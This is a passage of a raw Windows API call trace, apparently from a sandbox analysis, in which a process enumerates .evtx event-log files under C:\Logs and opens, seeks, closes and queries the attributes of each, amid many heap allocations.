Size=0x40) returned 0x533b8 [0087.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0087.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0087.565] AreFileApisANSI () returned 1 [0087.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46978 [0087.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46978, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 51 [0087.566] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.566] GetFileType (hFile=0x424) returned 0x1 [0087.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0087.566] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.566] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.566] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.566] CloseHandle (hObject=0x424) returned 1 [0087.567] AreFileApisANSI () returned 1 [0087.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46ba8 [0087.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46ba8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 51 [0087.567] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.567] GetFileType (hFile=0x424) returned 0x1 [0087.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0087.567] CloseHandle (hObject=0x424) returned 1 [0087.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.568] AreFileApisANSI () returned 1 [0087.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46278 [0087.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46278, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 51 [0087.568] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74ac348, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74ac348, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0087.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.568] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50aff605, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50aff605, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-User Profile Service%4Operational.evtx", cAlternateFileName="MI4D4C~1.EVT")) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68bd0 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x466d8 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68bd0 | out: hHeap=0x20000) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cae8 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0087.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0087.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0087.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0087.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0087.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0087.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0087.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0087.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0087.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0087.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0087.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0087.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0087.569] AreFileApisANSI () returned 1 [0087.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx", lpUsedDefaultChar=0x0) returned 65 [0087.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0087.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0087.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.569] AreFileApisANSI () returned 1 [0087.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0087.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x820e8 [0087.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x820e8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 65 [0087.570] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.570] GetFileType (hFile=0x424) returned 0x1 [0087.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x820e8 | out: hHeap=0x20000) returned 1 [0087.570] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.570] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.570] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.570] CloseHandle (hObject=0x424) returned 1 [0087.571] AreFileApisANSI () returned 1 [0087.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0087.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82dd8 [0087.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 65 [0087.571] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.571] GetFileType (hFile=0x424) returned 0x1 [0087.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0087.571] CloseHandle (hObject=0x424) returned 1 [0087.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0087.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0087.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0087.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0087.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0087.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0087.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0087.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0087.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0087.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0087.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0087.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0087.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.572] AreFileApisANSI () returned 1 [0087.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0087.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82c28 [0087.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 65 [0087.572] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50aff605, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50aff605, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0087.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.572] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50981e6e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50981e6e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cAlternateFileName="MI5FF0~1.EVT")) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0087.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0087.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0087.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0087.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0087.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0087.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0087.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0087.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.573] AreFileApisANSI () returned 1 [0087.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpUsedDefaultChar=0x0) returned 53 [0087.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0087.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0087.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.573] AreFileApisANSI () returned 1 [0087.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0087.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75eb8 [0087.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 53 [0087.574] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: 